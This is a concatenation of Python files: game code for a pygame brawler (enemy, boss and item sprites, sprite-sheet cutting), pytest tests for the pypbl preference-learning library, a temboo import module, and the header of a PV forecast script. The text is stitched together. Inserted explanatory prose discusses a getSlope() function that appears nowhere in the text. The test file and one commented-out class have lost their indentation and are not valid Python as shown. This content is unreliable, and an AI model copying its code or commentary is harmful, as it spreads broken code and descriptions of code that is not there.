    def update(self):
        #Idle R
        if self.accion==0:
            self.image = self.f[self.accion][self.indice]
            self.indice += 1
            if self.indice >= 4:
                self.indice=0
            self.vel_x = 0
            self.vel_y = 0
        #Idle L
        if self.accion==1:
            self.image = self.f[self.accion][self.indice]
            self.indice += 1
            if self.indice >= 4:
                self.finished = True
                self.indice=0
            self.vel_x = 0
            self.vel_y = 0
        #Walk R
        if self.accion==2:
            if self.indice <=5:
                self.image = self.f[self.accion][self.indice]
                '''
                if self.indice==0:
                    stepE.play()
                if self.indice==3:
                    stepE.play()
                '''
                self.indice += 1
            #Normally 7
            if self.indice > 5:
                self.finished = True
                self.indice=0
        #Walk L
        if self.accion==3:
            if self.indice <=5:
                self.image = self.f[self.accion][self.indice]
                '''
                if self.indice==0:
                    stepE.play()
                if self.indice==3:
                    stepE.play()
                '''
                self.indice += 1
            #Normally 7
            if self.indice > 5:
                self.finished = True
                self.indice=0
        #1
        #Attack R
        if self.accion==4:
            #if self.indice <=1:
            self.image = self.f[self.accion][self.indice]
            if self.indice==1:
                bite.play()
            self.indice += 1
            if self.indice >=4:
                self.finished = True
                self.indice=0
            self.vel_x = 0
            self.vel_y = 0
        #Attack L
        if self.accion==5:
            #if self.indice <=1:
            self.image = self.f[self.accion][self.indice]
            if self.indice==1:
                bite.play()
            self.indice += 1
            if self.indice >=4:
                self.finished = True
                self.indice=0
            self.vel_x = 0
            self.vel_y = 0
        #Die R
        if self.accion==6:
            if self.indice <2:
                if self.indice==0:
                    channel6.play(cry)
                self.image = self.f[self.accion][self.indice]
                self.indice += 1
            if self.indice >= 2:
                self.indice = 0
                self.finished = True
            self.vel_x = 0
            self.vel_y = 0
        #Die L
        if self.accion==7:
            if self.indice <=2:
                if self.indice==0:
                    channel6.play(cry)
                self.image = self.f[self.accion][self.indice]
                self.indice += 1
            if self.indice >= 2:
                self.indice = 0
                self.finished = True
        if self.accion in [6,7] and self.finished:
            self.canDie = True
            self.vel_x = 0
            self.vel_y = 0
        self.rect.y += self.vel_y
        self.rect.x += self.vel_x
        #if self.rect.x + self.rect.width > RESOLUTION[0] - bglimit:
        #    self.rect.x = RESOLUTION[0] - bglimit - self.rect.width
        #elif self.rect.x < bglimit:
        #    self.rect.x = bglimit
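getSlope() above returns the slope and intercept of the line through the enemy and the player, or False when the x-coordinates coincide (vertical line). The same arithmetic without pygame, using illustrative point values:

```python
def slope_intercept(p1, p2):
    # returns [m, b] for the line y = m*x + b through p1 and p2,
    # or False when the line is vertical (as getSlope does)
    if p1[0] == p2[0]:
        return False
    m = float(p2[1] - p1[1]) / (p2[0] - p1[0])
    b = p2[1] - m * p2[0]
    return [m, b]

# enemy spawn point (900, 500) toward a player at (300, 250)
line = slope_intercept((900, 500), (300, 250))
```

Both input points satisfy y = m*x + b, which is what makes the result usable for a line-of-sight check.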
class reptiles(pygame.sprite.Sprite):
    def __init__(self, matriz, pos):
        pygame.sprite.Sprite.__init__(self)
        self.m=matriz
        self.image=self.m[0][0]
        self.rect=self.image.get_rect()
        self.rect.x=pos[0]
        self.rect.y=pos[1]
        self.varx=0
        self.vary=0
        self.distancia=0
        self.i=0
        self.golpe=False
        self.accion=0
        self.mov=True
        #self.barra=barravida_enemigo(vector, self.rect.midtop)
        #groupbarras.add(self.barra)
        self.derecha=True
        self.izquierda=False
        self.Tespera=random.randrange(100,200)
        self.donacion=random.randrange(-5,10)
        self._health = 100
        self.Tmuerte=5
        '''
        self.f=matriz
        self.image=self.f[0][0]
        self.rect=self.image.get_rect()
        self.indice=0
        self.rect.x=900
        self.rect.y=500
        self.accion=0
        self.dir = 'R'
        self._health = 100
        self.finished = False
        self.canDie = False
        self.prevkey = None
        self.vel_y = 0
        self.vel_x = 0
        self.vel_x_value = 10
        self.vel_y_value = 6
        self.moverange = 50
        self.movetime = random.randrange(0,100)
        '''
    def update(self):
        self.rect.x=self.rect.x+self.varx
        self.rect.y=self.rect.y+self.vary
        #self.barra.update(self.rect.midtop)
        self.image=self.m[self.accion][self.i]
        self.i+=1
        if(self.Tespera>0):
            self.Tespera-=1
        if self.i>=len(self.m[self.accion]):
            self.i=0
            if self.derecha:
                self.i=0
                self.accion=0
                self.varx=0
            if self.izquierda:
                self.i=0
                self.accion=5
                self.varx=0
        if self._health<=0:
            self.Tmuerte-=1
    def left(self):
        self.izquierda=True
        self.derecha=False
        self.accion=6
        self.varx=-10
    def right(self):
        self.derecha=True
        self.izquierda=False
        self.accion=1
        self.varx=10
    def golpear(self):
        if self.derecha:
            if(self.Tespera<=0):
                self.accion=2
                self.golpe=True
                self.Tespera=random.randrange(100,200)
                self.varx=0
                self.i=0
        if self.izquierda:
            if(self.Tespera<=0):
                self.accion=7
                self.golpe=True
                self.Tespera=random.randrange(100,200)
                self.varx=0
                self.i=0
channel6 = pygame.mixer.Channel(5)
def recortarBoss(archivo):
    fondo=pygame.image.load(archivo)
    infoFondo=fondo.get_rect()
    matriz=[]
    idleR=[]
    idleL=[]
    walkR=[]
    walkL=[]
    attack1R=[]
    attack1L=[]
    dieR=[]
    dieL=[]
    idle=[[5, 51, 228, 174], [280, 51, 228, 174], [552, 51, 228, 174], [825, 51, 228, 174], [1091, 51, 228, 174]]
    walkRight=[[0, 321, 228, 174] , [294, 321, 228, 174] , [554, 321, 228, 174] , [816, 321, 228, 174] , [1092, 321, 228, 174] ,[1362, 321, 228, 174] ]
    attack1=[[0,605,228,180], [282,554,228,227], [535,554,228,227], [820,554,228,227], [1108,605,192,180]]
    die=[[262, 111, 55, 57], [328, 111, 67, 57], [404, 11 ,74, 57]] #the boss size is 90x90
    #Idle R-L
    for x in range(5):
        cuadro=fondo.subsurface(idle[x])
        #cuadro=pygame.transform.scale(cuadro, (100, 125))
        cuadro2=pygame.transform.flip(cuadro, True, False)
        #cuadro2=pygame.transform.scale(cuadro2, (100, 125))
        idleR.append(cuadro)
        idleL.append(cuadro2)
    #Walk R-L
    for x in range(6):
        cuadro=fondo.subsurface(walkRight[x])
        #cuadro=pygame.transform.scale(cuadro, (100, 125))
        cuadro2=pygame.transform.flip(cuadro, True, False)
        #cuadro2=pygame.transform.scale(cuadro2, (100, 125))
        walkR.append(cuadro)
        walkL.append(cuadro2)
    #Attack 1 R-L
    for x in range(5):
        cuadro=fondo.subsurface(attack1[x])
        #cuadro=pygame.transform.scale(cuadro, (100, 125))
        cuadro2=pygame.transform.flip(cuadro, True, False)
        #cuadro2=pygame.transform.scale(cuadro2, (100, 125))
        attack1R.append(cuadro)
        attack1L.append(cuadro2)
    #Die 1 R-L
    for x in range(3):
        cuadro=fondo.subsurface(die[x])
        #cuadro=pygame.transform.scale(cuadro, (100, 125))
        cuadro2=pygame.transform.flip(cuadro, True, False)
        #cuadro2=pygame.transform.scale(cuadro2, (100, 125))
        dieR.append(cuadro)
        dieL.append(cuadro2)
    return idleR, idleL, walkR, walkL, attack1R, attack1L, dieR, dieL
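recortarBoss() cuts frames out of a single sprite sheet with subsurface; each rect is [x, y, w, h] and must lie fully inside the sheet, or subsurface raises ValueError. A pygame-free sketch of that bounds check (the 1600x900 sheet size is an assumed example, not taken from the actual asset):

```python
def rect_inside(sheet_w, sheet_h, rect):
    # True when the [x, y, w, h] frame rect fits fully inside the sheet,
    # i.e. pygame's subsurface() would accept it
    x, y, w, h = rect
    return x >= 0 and y >= 0 and x + w <= sheet_w and y + h <= sheet_h

# first three idle rects from the table above, checked against an assumed sheet size
idle = [[5, 51, 228, 174], [280, 51, 228, 174], [552, 51, 228, 174]]
ok = all(rect_inside(1600, 900, r) for r in idle)
```

Validating the tables this way before calling subsurface turns a runtime ValueError into an explicit check.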
class Boss(pygame.sprite.Sprite):
    def __init__(self, matriz, pos):
        pygame.sprite.Sprite.__init__(self)
        self.m=matriz
        self.image=self.m[0][0]
        self.rect=self.image.get_rect()
        self._health = 100
        self.rect.x=pos[0]
        self.rect.y=pos[1]
        self.varx=0
        self.vary=0
        self.distancia=0
        self.i=0
        self.golpe=False
        self.golpekatana=False
        self.golpeshuriken=False
        self.accion=0
        self.mov=True
        self.derecha=True
        self.izquierda=False
        self.Tespera=random.randrange(100,200)
        self.Tesperakatana=random.randrange(300,350)
        self.Tesperashuriken=random.randrange(400,450)
        self.salud=100
        self.Tmuerte=5
    def update(self):
        self.rect.x=self.rect.x+self.varx
        self.rect.y=self.rect.y+self.vary
        #self.barra.update(self.rect.midtop)  # commented out: __init__ never creates self.barra, so this raised AttributeError
        self.image=self.m[self.accion][self.i]
        self.i+=1
        if(self.Tespera>0):
            self.Tespera-=1
        if self.i>=len(self.m[self.accion]):
            self.i=0
            if self.derecha:
                self.i=0
                self.accion=0
                self.varx=0
            if self.izquierda:
                self.i=0
                self.accion=9
                self.varx=0
        if self.salud<=0:
            self.Tmuerte-=1
    def left(self):
        self.izquierda=True
        self.derecha=False
        self.accion=6
        self.varx=-10
    def right(self):
        self.derecha=True
        self.izquierda=False
        self.accion=1
        self.varx=10
    def golpear(self):
        if self.derecha:
            if(self.Tespera<=0):
                self.accion=3
                self.golpe=True
                self.Tespera=random.randrange(100,200)
                self.varx=0
                self.i=0
        if self.izquierda:
            if(self.Tespera<=0):
                self.accion=12
                self.golpe=True
                self.Tespera=random.randrange(100,200)
                self.varx=0
                self.i=0
    def acercar(self):
        if self.derecha:
            if(self.Tespera<=0):
                self.accion=2
                self.varx=10
                self.i=0
        if self.izquierda:
            if(self.Tespera<=0):
                self.accion=11
                self.varx=-10
                self.i=0
    def correr(self):
        if self.derecha:
            if(self.Tespera<=0):
                self.accion=5
                self.varx=20
                self.i=0
        if self.izquierda:
            if(self.Tespera<=0):
                self.accion=14
                self.varx=-20
                self.i=0
    """def salto(self):
        if self.derecha:
            if(self.Tespera<=0):
                self.accion=6
                #self.golpe=True
                #self.Tespera=random.randrange(100,200)
                self.varx=0
                self.i=0
        if self.izquierda:
            if(self.Tespera<=0):
                self.accion=15
                #self.golpe=True
                #self.Tespera=random.randrange(100,200)
                self.varx=0 #the actions follow the boss sprite sheet; this is how I handled right and left
                #adapt it to your own scheme if needed... Alejo, please fit the jump the same way as the wolverine
                self.i=0"""
    def ataquekatana(self):
        if self.derecha:
            if(self.Tesperakatana<=0):
                self.accion=7
                self.golpekatana=True
                self.Tesperakatana=random.randrange(100,200)
                self.varx=0
                self.i=0
        if self.izquierda:
            if(self.Tesperakatana<=0):
                self.accion=16
                self.golpekatana=True
                self.Tesperakatana=random.randrange(100,200)
                self.varx=0
                self.i=0
    def lanzashuriken(self):
        if self.derecha:
            if(self.Tesperashuriken<=0):
                self.accion=1
                self.golpeshuriken=True
                self.Tesperashuriken=random.randrange(100,200)
                self.varx=0
                self.i=0
        if self.izquierda:
            if(self.Tesperashuriken<=0):
                self.accion=10
                self.golpeshuriken=True
                self.Tesperashuriken=random.randrange(100,200)
                self.varx=0
                self.i=0
class ninjas(pygame.sprite.Sprite):
    def __init__(self, matriz, groupbarras, vector, pos):
        pygame.sprite.Sprite.__init__(self)
        self.m=matriz
        self.image=self.m[0][0]
        self.rect=self.image.get_rect()
        self.rect.x=pos[0]
        self.rect.y=pos[1]
        self.varx=0
        self.vary=0
        self.distancia=0
        self.i=0
        self.golpe=False
        self.accion=0
        self.mov=True
        self.barra=barravida_enemigo(vector, self.rect.midtop)
        groupbarras.add(self.barra)
        self.derecha=True
        self.izquierda=False
        self.Tespera=random.randrange(300,400)
        self.donacion=random.randrange(-10,10)
        self.salud=100
        self.Tmuerte= 5
    def update(self):
        self.rect.x=self.rect.x+self.varx
        self.rect.y=self.rect.y+self.vary
        print(self.accion, self.i, 'ninjas')  # debug output (parenthesized for Python 3 compatibility)
        self.image=self.m[self.accion][self.i]
        self.barra.update(self.rect.midtop)
        self.i+=1
        if(self.Tespera>0):
            self.Tespera-=1
        if self.i>=len(self.m[self.accion]):
            self.i=0
            if self.derecha:
                self.i=0
                self.accion=0
                self.varx=0
            if self.izquierda:
                self.i=0
                self.accion=5
                self.varx=0
        if self.salud<=0:
            self.Tmuerte-=1
    def left(self):
        self.izquierda=True
        self.derecha=False
        self.accion=6
        self.varx=-10
    def right(self):
        self.izquierda=False
        self.accion=1
        self.derecha=True
        self.varx=10
    def golpear(self):
        if self.derecha:
            if(self.Tespera<=0):
                self.i=0
                self.accion=4
                self.golpe=True
                self.Tespera=random.randrange(300,400)
                self.varx=0
        if self.izquierda:
            if(self.Tespera<=0):
                self.i=0
                self.accion=9
                self.golpe=True
                self.Tespera=random.randrange(300,400)
                self.varx=0
class enemigas(pygame.sprite.Sprite):
    def __init__(self, matriz, groupbarras, vector, pos):
        pygame.sprite.Sprite.__init__(self)
        self.m=matriz
        self.image=self.m[0][0]
        self.rect=self.image.get_rect()
        self.rect.x=pos[0]
        self.rect.y=pos[1]
        self.varx=0
        self.vary=0
        self.distancia=0
        self.i=0
        self.golpe=False
        self.accion=0
        self.mov=True
        self.barra=barravida_enemigo(vector, self.rect.midtop)
        groupbarras.add(self.barra)
        self.derecha=True
        self.izquierda=False
        self.Tespera=random.randrange(300,400)
        self.donacion=random.randrange(-10,10)
        self.salud=100
        self.Tmuerte=5
    def update(self):
        self.rect.x=self.rect.x+self.varx
        self.rect.y=self.rect.y+self.vary
        self.barra.update(self.rect.midtop)
        print(self.accion, self.i)  # debug output (parenthesized for Python 3 compatibility)
        self.image=self.m[self.accion][self.i]
        self.i+=1
        if(self.Tespera>0):
            self.Tespera-=1
        if self.i>=len(self.m[self.accion]):
            self.i=0
            if self.derecha:
                self.i=0
                self.accion=0
                self.varx=0
            if self.izquierda:
                self.i=0
                self.accion=4
                self.varx=0
        if self.salud<=0:
            self.Tmuerte-=1
    def left(self):
        self.izquierda=True
        self.derecha=False
        self.accion=5
        self.varx=-10
    def right(self):
        self.izquierda=False
        self.accion=1
        self.derecha=True
        self.varx=10
    def golpear(self):
        if self.derecha:
            if(self.Tespera<=0):
                self.i=0
                self.accion=2
                self.golpe=True
                self.Tespera=random.randrange(300,400)
                self.varx=0
        if self.izquierda:
            if(self.Tespera<=0):
                self.i=0
                self.accion=6
                self.golpe=True
                self.Tespera=random.randrange(300,400)
                self.varx=0
"""class colega(pygame.sprite.Sprite):
def __init__(self, matriz):
pygame.sprite.Sprite.__init__(self)
self.m=matriz
self.image=self.m[0][0]
self.rect=self.image.get_rect()
self.rect.x=50
self.rect.y=350
self.varx=0
self.vary=0
self.distancia=0
self.i=0
self.golpe=False
self.accion=0
self.mov=True
self.derecha=True
self.izquierda=False
self.Tespera=random.randrange(0,40)
self.salud=100
self.Tmuerte=5
def update(self):
self.rect.x=self.rect.x+self.varx
self.rect.y=self.rect.y+self.vary
self.image=self.m[self.accion][self.i]
self.i+=1
if(self.Tespera>0):
self.Tespera-=1
if self.i>=len(self.m[self.accion]):
self.i=0
if self.derecha:
self.i=0
self.accion=0
self.varx=0
if self.izquierda:
self.i=0
self.accion=5
self.varx=0
if self.salud<=0:
self.Tmuerte-=1
def left(self):
self.izquierda=True
self.derecha=False
self.accion=10
self.varx=-10
def right(self):
self.derecha=True
self.izquierda=False
self.accion=2
self.varx=10
def golpear(self):
if self.derecha:
if(self.Tespera<=0):
self.golpe=True
self.accion=4
self.Tespera=random.randrange(0,40)
self.varx=0
self.i=0
if self.izquierda:
if(self.Tespera<=0):
self.golpe=True
self.accion=12
self.Tespera=random.randrange(0,40)
self.varx=0
self.i=0
def patada(self):
if self.golpe:
if self.derecha:
if(self.Tespera<=0):
self.golpe=True
self.accion=5
self.Tespera=random.randrange(0,40)
self.varx=0
self.i=0
if self.izquierda:
if(self.Tespera<=0):
self.golpe=True
self.accion=13
self.Tespera=random.randrange(0,40)
self.varx=0
self.i=0
self.golpe=False
"""
class helado(pygame.sprite.Sprite):
    def __init__ (self,pos):
        pygame.sprite.Sprite.__init__(self)
        self.image=pygame.image.load("helado2.png")
        self.rect=self.image.get_rect()
        self.rect.x=pos[0]
        self.rect.y=pos[1]
        self.Ttime=100
        self.id=1
        self.sonido=pygame.mixer.Sound('obtencion.ogg')
        self.varx=0
    def update(self):
        if self.Ttime>0:
            self.Ttime-=1
        self.rect.x=self.rect.x+self.varx
    def desplazar(self):
        self.varx=-10
class pastel(pygame.sprite.Sprite):
    def __init__ (self,pos):
        pygame.sprite.Sprite.__init__(self)
        self.image=pygame.image.load("pastel.png")
        self.rect=self.image.get_rect()
        self.rect.x=pos[0]
        self.rect.y=pos[1]
        self.Ttime=100
        self.id=0
        self.sonido=pygame.mixer.Sound('obtencion.ogg')
        self.varx=0
    def update(self):
        if self.Ttime>0:
            self.Ttime-=1
        self.rect.x=self.rect.x+self.varx
    def desplazar(self):
        self.varx=-10
class golosina(pygame.sprite.Sprite):
    def __init__ (self,pos):
        pygame.sprite.Sprite.__init__(self)
        self.image=pygame.image.load("golosina.png")
        self.rect=self.image.get_rect()
        self.rect.x=pos[0]
        self.rect.y=pos[1]
        self.Ttime=100
        self.id=0
        self.varx=0
        self.sonido=pygame.mixer.Sound('obtencion.ogg')
    def update(self):
        if self.Ttime>0:
            self.Ttime-=1
        self.rect.x=self.rect.x+self.varx
    def desplazar(self):
        self.varx=-10
class fuego(pygame.sprite.Sprite):
    def __init__ (self, matriz):
        pygame.sprite.Sprite.__init__(self)
        self.m=matriz
        self.image=self.m[0][0]
        self.rect=self.image.get_rect()
        self.i=0
        self.rect.x=self.rect.x+300
        self.rect.y=self.rect.y-30
        self.retardo=20
    def update(self):
        if self.retardo<=0:
            self.i+=1
            if self.i<9:
                self.image=self.m[0][self.i]
            else:
                self.i=0
                self.image=self.m[0][0]
                self.retardo=20
        else:
            self.retardo-=1
class barravida_jugador(pygame.sprite.Sprite):
    def __init__ (self, vector):
        pygame.sprite.Sprite.__init__(self)
        self.v=vector
        self.image=self.v[0][0]
        self.rect=self.image.get_rect()
        self.i=0
        self.rect.x=100
        self.rect.y=30
    def update(self):
        pass
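The enemy classes above all gate their attacks on a Tespera counter: decremented once per update, and re-armed with a random value when an attack fires. A minimal pygame-free sketch of that cooldown pattern (class and method names are illustrative, not from the game):

```python
import random

class Cooldown:
    def __init__(self, lo, hi):
        self.lo, self.hi = lo, hi
        self.t = random.randrange(lo, hi)
    def tick(self):
        # called once per frame, mirroring "if self.Tespera > 0: self.Tespera -= 1"
        if self.t > 0:
            self.t -= 1
    def try_fire(self):
        # attack only when the counter has run out, then re-arm it,
        # mirroring "if self.Tespera <= 0: ...; self.Tespera = random.randrange(...)"
        if self.t <= 0:
            self.t = random.randrange(self.lo, self.hi)
            return True
        return False

cd = Cooldown(3, 6)
fired = []
for _ in range(30):
    cd.tick()
    fired.append(cd.try_fire())
```

Over 30 frames the attack fires several times but never on consecutive early frames, which is exactly the pacing effect the Tespera counters produce.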
# File: tests/test_elicitation.py (repo: jimparr19/pypbl, license: MIT)
import pytest
import numpy as np
import pandas as pd
from pypbl.elicitation import BayesPreference
from pypbl.priors import Normal, Exponential
@pytest.fixture
def basic_model():
data = pd.DataFrame({'x': [1, 0, 1], 'y': [0, 1, 1]}, index=['item 0', 'item 1', 'item 2'])
model = BayesPreference(data=data)
return model
def test_set_priors(basic_model):
assert basic_model.priors is None
basic_model.set_priors([Normal(), Normal()])
for prior in basic_model.priors:
assert isinstance(prior, Normal)
def test_incorrect_set_priors(basic_model):
assert basic_model.priors is None
with pytest.raises(AttributeError):
basic_model.set_priors([Normal()])
def test_set_strict_preference(basic_model):
assert len(basic_model.strict_preferences) == 0
basic_model.add_strict_preference('item 0', 'item 1')
assert len(basic_model.strict_preferences) == 1
def test_set_strict_preference_invalid_items(basic_model):
with pytest.raises(ValueError):
basic_model.add_strict_preference(0, 1)
def test_set_indifferent_preference(basic_model):
assert len(basic_model.indifferent_preferences) == 0
basic_model.add_indifferent_preference('item 0', 'item 1')
assert len(basic_model.indifferent_preferences) == 1
def test_set_invalid_preference_invalid_items(basic_model):
with pytest.raises(ValueError):
basic_model.add_indifferent_preference(0, 1)
def test_remove_last_strict_preference(basic_model):
assert len(basic_model.strict_preferences) == 0
basic_model.add_strict_preference('item 0', 'item 1')
assert len(basic_model.strict_preferences) == 1
basic_model.remove_last_strict_preference()
assert len(basic_model.strict_preferences) == 0
def test_strict_log_probability(basic_model):
basic_model.set_priors([Normal(1, 0.5), Exponential(0.5)])
x = np.array([1.0, 0.5])
assert basic_model.strict_log_probability(('item 0', 'item 1'), x) == pytest.approx(-0.1413058, 0.001)
assert basic_model.strict_log_probability(('item 1', 'item 0'), x) == pytest.approx(-2.026650, 0.001)
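pypbl's internal likelihood is not shown in this file; purely as a point of comparison, strict preferences "a over b" are commonly scored with a log-sigmoid of the utility gap w·(x_a − x_b). A self-contained sketch of that generic formulation (an illustration, not pypbl's actual implementation):

```python
import math

def strict_log_prob(x_a, x_b, w):
    # log sigmoid of the utility gap w.(x_a - x_b); closer to 0 (less negative)
    # when item a beats item b under weights w
    gap = sum(wi * (ai - bi) for wi, ai, bi in zip(w, x_a, x_b))
    return -math.log(1.0 + math.exp(-gap))

# features from the fixture above: item 0 = (1, 0), item 1 = (0, 1)
better = strict_log_prob((1, 0), (0, 1), (1.0, 0.5))
worse = strict_log_prob((0, 1), (1, 0), (1.0, 0.5))
```

As in the asserted values above, the preference consistent with the weights scores higher than its reversal.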
def test_indifferent_log_probability(basic_model):
basic_model.set_priors([Normal(1, 0.5), Exponential(0.5)])
x = np.array([1.0, 0.5])
assert basic_model.indifferent_log_probability(('item 0', 'item 1'), x) == pytest.approx(-0.7188213, 0.001)
def test_log_probability(basic_model):
basic_model.set_priors([Normal(1, 0.5), Exponential(0.5)])
x = np.array([1.0, 0.5])
assert basic_model.log_probability(x) == basic_model.priors[0](x[0]) + basic_model.priors[1](x[1])
def test_negative_log_probability(basic_model):
basic_model.set_priors([Normal(1, 0.5), Exponential(0.5)])
x = np.array([1.0, 0.5])
assert basic_model.negative_log_probability(x) == - basic_model.log_probability(x)
def test_probability(basic_model):
basic_model.set_priors([Normal(1, 0.5), Exponential(0.5)])
x = np.array([1.0, 0.5])
assert basic_model.probability(x) == np.exp(basic_model.log_probability(x))
def test_inference_raises_error(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
with pytest.raises(ValueError):
basic_model.infer_weights(method='test')
def test_inference_with_normal_priors(basic_model):
basic_model.set_priors([Normal(1, 0.5), Normal(2, 0.5)])
assert basic_model.weights is None
basic_model.infer_weights()
assert all(a - b < 1e-4 for a, b in zip(basic_model.weights.tolist(), [1, 2]))
def test_inference_with_normal_priors_parsing_method(basic_model):
basic_model.set_priors([Normal(1, 0.5), Normal(2, 0.5)])
assert basic_model.weights is None
basic_model.infer_weights(method='MAP')
assert all(a - b < 1e-4 for a, b in zip(basic_model.weights.tolist(), [1, 2]))
def test_inference_with_normal_priors_parsing_mean_method(basic_model):
basic_model.set_priors([Normal(1, 0.5), Normal(2, 0.5)])
assert basic_model.weights is None
basic_model.infer_weights(method='mean', iterations=500)
assert all(a - b < 0.5 for a, b in zip(basic_model.weights.tolist(), [1, 2]))
def test_inference_with_different_priors(basic_model):
basic_model.set_priors([Normal(1, 1), Exponential(-0.5)])
assert basic_model.weights is None
with pytest.warns(UserWarning):
basic_model.infer_weights()
assert all(a - b < 1e-4 for a, b in zip(basic_model.weights.tolist(), [1, 0]))
def test_inference_with_strict_preferences(basic_model):
basic_model.set_priors([Normal(0, 1), Normal(0, 1)])
basic_model.add_strict_preference('item 0', 'item 2')
assert basic_model.weights is None
basic_model.infer_weights()
assert basic_model.weights is not None
assert basic_model.weights[0] > basic_model.weights[1]
basic_model.add_strict_preference('item 1', 'item 2')
basic_model.infer_weights()
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
assert basic_model.weights[0] > basic_model.weights[1]
def test_inference_with_indifferent_preferences(basic_model):
basic_model.set_priors([Normal(0, 1), Normal(0, 1)])
basic_model.add_indifferent_preference('item 0', 'item 2')
basic_model.infer_weights()
assert basic_model.weights[0] == basic_model.weights[1]
basic_model.add_indifferent_preference('item 1', 'item 2')
basic_model.infer_weights()
assert basic_model.weights[0] == basic_model.weights[1]
def test_inference_with_strict_and_indifferent_preferences(basic_model):
basic_model.set_priors([Normal(0, 1), Normal(0, 1)])
basic_model.add_strict_preference('item 0', 'item 2')
assert basic_model.weights is None
basic_model.infer_weights()
assert basic_model.weights is not None
assert basic_model.weights[0] > basic_model.weights[1]
basic_model.add_strict_preference('item 1', 'item 2')
basic_model.infer_weights()
assert basic_model.weights[0] == basic_model.weights[1]
basic_model.add_indifferent_preference('item 0', 'item 1')
basic_model.infer_weights()
assert basic_model.weights[0] == basic_model.weights[1]
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
assert basic_model.weights[0] > basic_model.weights[1]
def test_inference_with_strict_and_indifferent_preferences_with_mean_method(basic_model):
basic_model.set_priors([Normal(0, 1), Normal(0, 1)])
basic_model.add_strict_preference('item 0', 'item 2')
basic_model.add_strict_preference('item 1', 'item 2')
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights(method='mean')
assert basic_model.weights[0] > basic_model.weights[1]
def test_suggest_new_pair_random_method(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 2')
basic_model.add_strict_preference('item 1', 'item 2')
basic_model.infer_weights()
new_pair = basic_model.suggest_new_pair(method='random')
for item in new_pair:
assert item in ['item 0', 'item 1']
def test_suggest_random_method(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
pair = basic_model.suggest(method='random')
assert 'item 0' in pair
def test_suggest_new_pair_entropy_method(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 2')
basic_model.add_strict_preference('item 1', 'item 2')
basic_model.infer_weights()
new_pair = basic_model.suggest_new_pair(method='min_entropy')
for item in new_pair:
assert item in ['item 0', 'item 1']
def test_suggest_entropy_method(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
pair = basic_model.suggest(method='min_entropy')
assert 'item 0' in pair
def test_suggest_variance_method(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
pair = basic_model.suggest(method='max_variance')
assert 'item 0' in pair
def test_suggest_all_suggested_pairs(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.add_strict_preference('item 0', 'item 2')
basic_model.infer_weights()
with pytest.warns(UserWarning):
pair = basic_model.suggest()
assert 'item 0' not in pair
def test_suggest_raises_error(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.add_strict_preference('item 0', 'item 2')
with pytest.raises(ValueError):
basic_model.suggest(method='test')
with pytest.raises(ValueError):
basic_model.suggest_new_pair(method='test')
def test_rank(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 2', 'item 0')
basic_model.add_strict_preference('item 2', 'item 1')
basic_model.add_strict_preference('item 1', 'item 0')
basic_model.infer_weights()
rank = basic_model.rank()
assert rank.index[0] == 'item 2'
assert rank.index[1] == 'item 1'
assert rank.index[2] == 'item 0'
def test_rank_automatic_inference(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 2', 'item 0')
basic_model.add_strict_preference('item 2', 'item 1')
basic_model.add_strict_preference('item 1', 'item 0')
rank = basic_model.rank()
assert rank.index[0] == 'item 2'
assert rank.index[1] == 'item 1'
assert rank.index[2] == 'item 0'
def test_compute_entropy(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
low_entropy = basic_model.compute_entropy(['item 0', 'item 2'])
high_entropy = basic_model.compute_entropy(['item 0', 'item 1'])
assert high_entropy
assert low_entropy
def test_compute_entropy_automatic_inference(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
low_entropy = basic_model.compute_entropy(['item 0', 'item 2'])
high_entropy = basic_model.compute_entropy(['item 0', 'item 1'])
assert high_entropy
assert low_entropy
if __name__ == '__main__':
pytest.main()
# File: temboo/core/Library/RunKeeper/GeneralMeasurements/__init__.py (repo: jordanemedlock/psychtruths, license: Apache-2.0)
from temboo.Library.RunKeeper.GeneralMeasurements.CreateEntry import CreateEntry, CreateEntryInputSet, CreateEntryResultSet, CreateEntryChoreographyExecution
from temboo.Library.RunKeeper.GeneralMeasurements.DeleteEntry import DeleteEntry, DeleteEntryInputSet, DeleteEntryResultSet, DeleteEntryChoreographyExecution
from temboo.Library.RunKeeper.GeneralMeasurements.RetrieveEntries import RetrieveEntries, RetrieveEntriesInputSet, RetrieveEntriesResultSet, RetrieveEntriesChoreographyExecution
from temboo.Library.RunKeeper.GeneralMeasurements.RetrieveEntry import RetrieveEntry, RetrieveEntryInputSet, RetrieveEntryResultSet, RetrieveEntryChoreographyExecution
from temboo.Library.RunKeeper.GeneralMeasurements.RetrieveLatestEntry import RetrieveLatestEntry, RetrieveLatestEntryInputSet, RetrieveLatestEntryResultSet, RetrieveLatestEntryChoreographyExecution
from temboo.Library.RunKeeper.GeneralMeasurements.UpdateEntry import UpdateEntry, UpdateEntryInputSet, UpdateEntryResultSet, UpdateEntryChoreographyExecution
# File: forecast.py (repo: ID-EDGe/DR-CC-tool, license: MIT)
# -*- coding: utf-8 -*-
"""
Master Thesis Dominic Scotoni
PV Forecast File
Versions:
1: Gaussian Samples out-of-sample
2: Gaussian Samples in-sample
"""
###############################################################################
## IMPORT PACKAGES & SCRIPTS ##
###############################################################################
### PACKAGES ###
import numpy as np
import pandas as pd
import pickle as pkl
### SCRIPTS ###
import param as pm
###############################################################################
